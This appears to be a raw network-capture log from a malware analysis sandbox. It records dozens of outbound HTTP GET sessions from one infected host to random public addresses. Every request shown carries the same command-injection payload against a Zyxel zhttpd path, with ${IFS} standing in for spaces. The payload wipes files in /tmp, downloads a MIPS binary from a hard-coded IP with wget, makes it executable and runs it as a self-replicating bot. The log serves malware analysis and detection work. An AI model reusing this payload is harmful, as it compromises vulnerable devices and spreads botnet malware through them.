                                      Jan 19, 2024 17:29:45.026938915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7466192.168.2.144750431.236.31.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.026992083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7467192.168.2.1440296160.60.27.191443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.027031898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7468192.168.2.1456252156.242.149.27443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.027074099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7469192.168.2.1450808216.242.139.239443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.027103901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7470192.168.2.1445110203.95.99.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.027148962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7471192.168.2.1444260165.130.7.172443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.027184963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7472192.168.2.1457618172.50.4.14443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.027230024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7473192.168.2.1455204122.34.68.57443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.027251959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7474192.168.2.144156636.171.63.51443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.027311087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7475192.168.2.1459730164.103.165.140443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.027343988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7476192.168.2.1442468109.32.28.223443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.027395964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7477192.168.2.1453046170.204.99.20443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.027430058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7478192.168.2.1447198195.220.23.123443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.027470112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7479192.168.2.1442592197.102.200.134443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.027493000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7480192.168.2.1442970132.84.47.152443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.027556896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7481192.168.2.1449466177.193.131.91443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.027585983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7482192.168.2.145382474.220.69.26443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.027616024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7483192.168.2.1460386120.183.143.205443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.027667046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7484192.168.2.1452462206.66.231.122443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.027712107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7485192.168.2.1460076211.55.219.118443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.027748108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7486192.168.2.1438040111.138.33.46443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.027769089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7487192.168.2.1434040113.124.194.195443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.027802944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7488192.168.2.1435260174.27.88.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.027836084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7489192.168.2.1444442152.206.204.255443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.027873039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7490192.168.2.144722253.233.37.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.027965069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7491192.168.2.1438446155.76.221.3443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.027966976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7492192.168.2.145850436.192.58.97443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.027996063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7493192.168.2.144841427.163.14.219443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.028023005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7494192.168.2.1448262173.167.166.137443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.028043032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7495192.168.2.1445684112.185.84.212443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.028098106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7496192.168.2.1454826161.254.16.108443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.028134108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7497192.168.2.1446644131.212.53.137443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.028184891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7498192.168.2.1452444145.252.125.61443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.028219938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7499192.168.2.1450784121.230.235.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.028251886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7500192.168.2.1455214144.118.122.218443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.028290033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7501192.168.2.144071431.19.133.108443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.028340101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7502192.168.2.145644474.237.42.142443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.028373003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7503192.168.2.1440322118.68.136.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.028402090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7504192.168.2.143916458.91.247.247443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.028464079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7505192.168.2.143682050.211.124.169443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.028501034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7506192.168.2.144066899.166.218.152443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.028531075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7507192.168.2.1456548160.106.183.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.028584957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7508192.168.2.1447352126.220.180.68443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.028636932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7509192.168.2.144395899.80.29.68443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.028676987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7510192.168.2.143821677.94.37.133443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.028713942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7511192.168.2.143474837.226.5.141443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.028764963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7512192.168.2.145527680.218.189.161443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.028794050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7513192.168.2.1447662222.253.59.188443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.028851032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7514192.168.2.144663287.123.20.119443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.028888941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7515192.168.2.1451506115.136.251.214443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.028923988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7516192.168.2.143771625.118.241.184443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.028949976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7517192.168.2.1456620103.224.39.75443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.028964996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7518192.168.2.145870612.18.45.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.029015064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7519192.168.2.145765439.194.154.22443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.029050112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7520192.168.2.143823223.74.127.57443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.029095888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7521192.168.2.1455106173.224.189.176443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.029125929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7522192.168.2.143370480.138.9.188443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.029162884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7523192.168.2.1443594203.211.60.94443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.029208899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7524192.168.2.1454900178.253.54.129443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.029254913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7525192.168.2.144440854.62.102.36443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.029285908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7526192.168.2.144163251.150.148.248443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.029364109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7527192.168.2.1441814162.141.59.194443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.029391050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7528192.168.2.1432818113.19.222.196443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.029429913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7529192.168.2.143799083.203.117.108443
                                      TimestampBytes transferredDirectionData
